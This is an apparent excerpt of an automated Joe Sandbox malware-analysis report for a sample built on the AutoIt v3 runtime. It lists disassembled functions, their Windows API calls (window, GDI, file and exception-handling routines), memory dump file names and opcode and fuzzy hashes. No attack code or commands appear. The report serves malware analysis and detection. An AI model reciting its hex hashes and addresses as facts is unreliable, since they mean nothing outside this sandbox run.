            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: mouse_event
            • String ID:
            • API String ID: 2434400541-0
            • Opcode ID: 6354a90f3ee0168839facf3cea61172bcfcb21b980d2adce27c0e66caba4e067
            • Instruction ID: 799d41f694b2343745e1fe1711b5dbe9551f58f2963e4174dcbe899afc5a16c9
            • Opcode Fuzzy Hash: 6354a90f3ee0168839facf3cea61172bcfcb21b980d2adce27c0e66caba4e067
            • Instruction Fuzzy Hash: 90D05EF61982013DFABF0A3CCA2FF7A2F88E301581F44DF89B2C1F95C9D681A4444021
            Function 00FC09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00FC03EE), ref: 00FC09DA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 063ea184c0c1640b6a37ddc992ae7baaccd52a48778b5ec3ac7e50db94a388b8
            • Instruction ID: 5c9f4b50d04c2be7da4ba455f3839c7237e81e6fb8bf25eeee3f75d9a281b49a
            • Opcode Fuzzy Hash: 063ea184c0c1640b6a37ddc992ae7baaccd52a48778b5ec3ac7e50db94a388b8
            • Instruction Fuzzy Hash:
            Function 00FC781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
            • Instruction ID: 4c87e09ce3cdc147117899d6f0273eb967ceac16c15343bbea7e35d6c49fb67a
            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
            • Instruction Fuzzy Hash: B9516922E0C70757DB3875294B5BFBE63959B12360F28050DEA82C76C2C629DE06FF51
            Function 00FD6DD9 Relevance: .6, Instructions: 637COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dcb04e44dcc166404a6040ca6063fba16d886accd0663e98e90a94fac40deaa0
            • Instruction ID: d5c3f8e2290c440c417266606962b1f43fa20974b08ac57be5a1363f6e68f226
            • Opcode Fuzzy Hash: dcb04e44dcc166404a6040ca6063fba16d886accd0663e98e90a94fac40deaa0
            • Instruction Fuzzy Hash: A1328A71E28F014ED733A534E9623356249AFB33D5F19C737F816B9A99EB29C4835200
            Function 00FBCC39 Relevance: .6, Instructions: 635COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 93137bb8dc78820962103a7cb02ba4013dfe9933bedd54005a17f627b5d1be30
            • Instruction ID: c9fe939efc39d2d17e7e4ccd222864cf184bec6dcab5a81302b9c129d0088b5c
            • Opcode Fuzzy Hash: 93137bb8dc78820962103a7cb02ba4013dfe9933bedd54005a17f627b5d1be30
            • Instruction Fuzzy Hash: DC322A72E0416D8BCF24CE29C6906BE7BA1EF45320F284566D799DB6A5D234DC41FBC0
            Function 00FA7920 Relevance: .6, Instructions: 563COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 39378d4a85988fd470ca16b9f209b5ef43423662727b6eef7e69d259a184e017
            • Instruction ID: 11ab99626b8fb2efdb5d275fc5ade0203cb3b182abc35c1c28fa0b383dffb10a
            • Opcode Fuzzy Hash: 39378d4a85988fd470ca16b9f209b5ef43423662727b6eef7e69d259a184e017
            • Instruction Fuzzy Hash: 3A22D0B0E0060ADFDF14DF65CC41AAEB3B6FF45314F104129E816A7291EB3AAD15EB60
            Function 00FA91C0 Relevance: .5, Instructions: 475COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c5f953b073ab8d6981056b2991db263feff09f1b287af9725bd5e1e2671086d
            • Instruction ID: 8533019e5fdcb5d858ef0b361fab6b4ce64e609f1862e0343882db3924c42769
            • Opcode Fuzzy Hash: 3c5f953b073ab8d6981056b2991db263feff09f1b287af9725bd5e1e2671086d
            • Instruction Fuzzy Hash: BC02C6B1E00206EBDB14DF65DC81BAEB7B5FF44300F108169E8169B290EB75ED15EB90
            Function 00FC1C77 Relevance: .3, Instructions: 254COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
            • Instruction ID: a357952154d70ec52bf13c53b4652c3e1c6119b1b68bac4957e68d49201082e3
            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
            • Instruction Fuzzy Hash: 9B9178739080A349D72946398676A7DFFE16A933B1319079DE4F3CA1C2EE20D574F620
            Function 00FC19B0 Relevance: .2, Instructions: 240COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
            • Instruction ID: c219d4ea351ca8153daf3016f2935d54e14e4ce6deaea2faf1e38f53b75ac515
            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
            • Instruction Fuzzy Hash: BA9156736090A349DB2D42798675A3DFFE16A933B1319079DD4F2CA1C2FD24C975BA20
            Function 00FC7A4A Relevance: .2, Instructions: 237COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7656e81515a01a7281f8420dec6c7a6ac4c5c4450d20214d240cced459788d67
            • Instruction ID: 02678067e4e45c4ac59fa5aef9c5417fb0571d1765f8633665897688a28a1343
            • Opcode Fuzzy Hash: 7656e81515a01a7281f8420dec6c7a6ac4c5c4450d20214d240cced459788d67
            • Instruction Fuzzy Hash: 6E615971A0870766DB38B9288F97FBE3394DF81770F14091DE842CB295D619AE42BF15
            Function 00FC7CA7 Relevance: .2, Instructions: 237COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0973c04de6f9b39b90b3a358a8d4340d20b0703cc5d98368e4ac4f15f8e21612
            • Instruction ID: e6a660097e046a0b095161f0fa3e62849de2e009e99d4b1b31857fae135634ea
            • Opcode Fuzzy Hash: 0973c04de6f9b39b90b3a358a8d4340d20b0703cc5d98368e4ac4f15f8e21612
            • Instruction Fuzzy Hash: 67615972E0870B67DA3879284B53FBF33949F42760F14095DE843DB281DA16AD42FE55
            Function 00FC1706 Relevance: .2, Instructions: 232COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
            • Instruction ID: e0c6c2541b6acde1506ec7a3b43e47a54a4506a569baa877e6c9027e168cb299
            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
            • Instruction Fuzzy Hash: 538156739090A349DB6942398675A3EFFE17E933B1319079DD4F2CA5C2ED248574F620
            Function 01012046 Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9e717cb87a9a0226c9987cfa4e6a103138804cdcc6388f03ab2cf31e6de52068
            • Instruction ID: c36b39806391e75fa300b5e0a9848ce2d314ec7fa4879b7829aa1241769e818b
            • Opcode Fuzzy Hash: 9e717cb87a9a0226c9987cfa4e6a103138804cdcc6388f03ab2cf31e6de52068
            • Instruction Fuzzy Hash: 7421A5326206118BD728CE79C92267A73E5A754210F25866EE4E7D37C5DE3AA904CB80
            Function 01022ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
            Download Yara Rule
            APIs
            • DeleteObject.GDI32(00000000), ref: 01022B30
            • DeleteObject.GDI32(00000000), ref: 01022B43
            • DestroyWindow.USER32 ref: 01022B52
            • GetDesktopWindow.USER32 ref: 01022B6D
            • GetWindowRect.USER32(00000000), ref: 01022B74
            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01022CA3
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01022CB1
            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022CF8
            • GetClientRect.USER32(00000000,?), ref: 01022D04
            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01022D40
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D62
            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D75
            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D80
            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D89
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D98
            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DA1
            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DA8
            • GlobalFree.KERNEL32(00000000), ref: 01022DB3
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DC5
            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0103FC38,00000000), ref: 01022DDB
            • GlobalFree.KERNEL32(00000000), ref: 01022DEB
            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01022E11
            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01022E30
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022E52
            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0102303F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
            • String ID: $AutoIt v3$DISPLAY$static
            • API String ID: 2211948467-2373415609
            • Opcode ID: c9f05a5b4b9fce61898ba52ca284bc799086a62334efd65cea1ce00ab111fa6b
            • Instruction ID: 0c5d4036d6c599c0b2fd295a2fd1942fe6f2335ad28cc73d2a2b323ab88e33b2
            • Opcode Fuzzy Hash: c9f05a5b4b9fce61898ba52ca284bc799086a62334efd65cea1ce00ab111fa6b
            • Instruction Fuzzy Hash: 58028D71900214AFEB24DFA4CD89EAE7BB9FF49310F048159F955EB295C739AD00CB60
            Function 010370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
            Download Yara Rule
            APIs
            • SetTextColor.GDI32(?,00000000), ref: 0103712F
            • GetSysColorBrush.USER32(0000000F), ref: 01037160
            • GetSysColor.USER32(0000000F), ref: 0103716C
            • SetBkColor.GDI32(?,000000FF), ref: 01037186
            • SelectObject.GDI32(?,?), ref: 01037195
            • InflateRect.USER32(?,000000FF,000000FF), ref: 010371C0
            • GetSysColor.USER32(00000010), ref: 010371C8
            • CreateSolidBrush.GDI32(00000000), ref: 010371CF
            • FrameRect.USER32(?,?,00000000), ref: 010371DE
            • DeleteObject.GDI32(00000000), ref: 010371E5
            • InflateRect.USER32(?,000000FE,000000FE), ref: 01037230
            • FillRect.USER32(?,?,?), ref: 01037262
            • GetWindowLongW.USER32(?,000000F0), ref: 01037284
              • Part of subcall function 010373E8: GetSysColor.USER32(00000012), ref: 01037421
              • Part of subcall function 010373E8: SetTextColor.GDI32(?,?), ref: 01037425
              • Part of subcall function 010373E8: GetSysColorBrush.USER32(0000000F), ref: 0103743B
              • Part of subcall function 010373E8: GetSysColor.USER32(0000000F), ref: 01037446
              • Part of subcall function 010373E8: GetSysColor.USER32(00000011), ref: 01037463
              • Part of subcall function 010373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01037471
              • Part of subcall function 010373E8: SelectObject.GDI32(?,00000000), ref: 01037482
              • Part of subcall function 010373E8: SetBkColor.GDI32(?,00000000), ref: 0103748B
              • Part of subcall function 010373E8: SelectObject.GDI32(?,?), ref: 01037498
              • Part of subcall function 010373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 010374B7
              • Part of subcall function 010373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010374CE
              • Part of subcall function 010373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 010374DB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
            • String ID:
            • API String ID: 4124339563-0
            • Opcode ID: 326a934dafa9eccbaa91068987b5a2a03defe5f5922b5975af1a597408993399
            • Instruction ID: 75a934ab43d19881bb683fd5fd3378dca81d9ff52e0f0bf869528a5bd3ee5165
            • Opcode Fuzzy Hash: 326a934dafa9eccbaa91068987b5a2a03defe5f5922b5975af1a597408993399
            • Instruction Fuzzy Hash: 8BA19272008301AFE7119F64DD48A5B7BEDFB89320F100A1AFAE2E61D0D776D544CB51
            Function 00FB8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(?,?), ref: 00FB8E14
            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FF6AC5
            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FF6AFE
            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FF6F43
              • Part of subcall function 00FB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB8BE8,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8FC5
            • SendMessageW.USER32(?,00001053), ref: 00FF6F7F
            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FF6F96
            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF6FAC
            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF6FB7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
            • String ID: 0
            • API String ID: 2760611726-4108050209
            • Opcode ID: 8d44db35e2e534e02a296aff132cd5f159b789b893dc7165cdc6faca2590046f
            • Instruction ID: 022440b2bf629bb5534550745495fa4750d37fad6da68a9ecee3e1ca077e6316
            • Opcode Fuzzy Hash: 8d44db35e2e534e02a296aff132cd5f159b789b893dc7165cdc6faca2590046f
            • Instruction Fuzzy Hash: EC12AD31A00205AFD725DF14C984BB9BBA9FF88320F144469F695DB2A1CB36EC52EF51
            Function 01022711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(00000000), ref: 0102273E
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0102286A
            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010228A9
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010228B9
            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01022900
            • GetClientRect.USER32(00000000,?), ref: 0102290C
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01022955
            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01022964
            • GetStockObject.GDI32(00000011), ref: 01022974
            • SelectObject.GDI32(00000000,00000000), ref: 01022978
            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01022988
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01022991
            • DeleteDC.GDI32(00000000), ref: 0102299A
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010229C6
            • SendMessageW.USER32(00000030,00000000,00000001), ref: 010229DD
            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01022A1D
            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01022A31
            • SendMessageW.USER32(00000404,00000001,00000000), ref: 01022A42
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01022A77
            • GetStockObject.GDI32(00000011), ref: 01022A82
            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01022A8D
            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01022A97
            Strings
            Memory Dump Source
